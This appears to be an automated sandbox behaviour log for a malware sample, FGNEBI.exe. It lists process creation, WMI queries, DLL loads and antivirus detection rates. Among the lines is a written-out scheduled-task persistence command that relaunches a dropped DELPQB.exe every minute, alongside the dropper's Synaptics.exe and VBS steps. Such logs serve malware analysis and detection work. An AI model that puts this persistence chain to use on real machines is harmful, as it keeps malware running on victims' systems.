                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_FGNEBI.exe'
                              Source: C:\Users\user\Desktop\FGNEBI.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: FGNEBI.exeReversingLabs: Detection: 92%
                              Source: FGNEBI.exeVirustotal: Detection: 87%
                              Source: C:\Users\user\Desktop\FGNEBI.exeFile read: C:\Users\user\Desktop\FGNEBI.exeJump to behavior
                              Source: unknownProcess created: C:\Users\user\Desktop\FGNEBI.exe "C:\Users\user\Desktop\FGNEBI.exe"
                              Source: C:\Users\user\Desktop\FGNEBI.exeProcess created: C:\Users\user\Desktop\._cache_FGNEBI.exe "C:\Users\user\Desktop\._cache_FGNEBI.exe"
                              Source: C:\Users\user\Desktop\FGNEBI.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                              Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn WLJOQW.exe /tr C:\Users\user\AppData\Roaming\Windata\DELPQB.exe /sc minute /mo 1
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeProcess created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\WLJOQW.vbs
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn WLJOQW.exe /tr C:\Users\user\AppData\Roaming\Windata\DELPQB.exe /sc minute /mo 1
                              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe C:\Users\user\AppData\Roaming\Windata\DELPQB.exe
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8036 -s 2908
                              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe "C:\Users\user\AppData\Roaming\Windata\DELPQB.exe"
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8036 -s 2908
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8036 -s 1292
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8036 -s 2772
                              Source: unknownProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe"
                              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe "C:\Users\user\AppData\Roaming\Windata\DELPQB.exe"
                              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe "C:\Users\user\AppData\Roaming\Windata\DELPQB.exe"
                              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe C:\Users\user\AppData\Roaming\Windata\DELPQB.exe
                              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe C:\Users\user\AppData\Roaming\Windata\DELPQB.exe
                              Source: C:\Users\user\Desktop\FGNEBI.exeProcess created: C:\Users\user\Desktop\._cache_FGNEBI.exe "C:\Users\user\Desktop\._cache_FGNEBI.exe" Jump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdateJump to behavior
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn WLJOQW.exe /tr C:\Users\user\AppData\Roaming\Windata\DELPQB.exe /sc minute /mo 1Jump to behavior
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeProcess created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\WLJOQW.vbsJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn WLJOQW.exe /tr C:\Users\user\AppData\Roaming\Windata\DELPQB.exe /sc minute /mo 1Jump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeSection loaded: wsock32.dllJump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeSection loaded: textshaping.dllJump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeSection loaded: twext.dllJump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeSection loaded: policymanager.dllJump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeSection loaded: msvcp110_win.dllJump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeSection loaded: ntshrui.dllJump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeSection loaded: cscapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeSection loaded: shacct.dllJump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeSection loaded: twinapi.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeSection loaded: idstore.dllJump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeSection loaded: samlib.dllJump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeSection loaded: starttiledata.dllJump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeSection loaded: acppage.dllJump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeSection loaded: aepic.dllJump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeSection loaded: wlidprov.dllJump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeSection loaded: samcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeSection loaded: provsvc.dllJump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeSection loaded: twext.dllJump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeSection loaded: ntshrui.dllJump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeSection loaded: starttiledata.dllJump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeSection loaded: acppage.dllJump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeSection loaded: aepic.dllJump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeSection loaded: winmm.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeSection loaded: wsock32.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeSection loaded: napinsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeSection loaded: pnrpnsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeSection loaded: wshbth.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeSection loaded: nlaapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeSection loaded: winrnr.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeSection loaded: sxs.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeSection loaded: napinsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeSection loaded: pnrpnsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeSection loaded: wshbth.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeSection loaded: nlaapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeSection loaded: winrnr.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeSection loaded: linkinfo.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeSection loaded: ntshrui.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeSection loaded: cscapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeSection loaded: napinsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeSection loaded: pnrpnsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeSection loaded: wshbth.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeSection loaded: nlaapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeSection loaded: winrnr.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: version.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wsock32.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: textshaping.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: schannel.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mskeyprotect.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ntasn1.dllJump to behavior
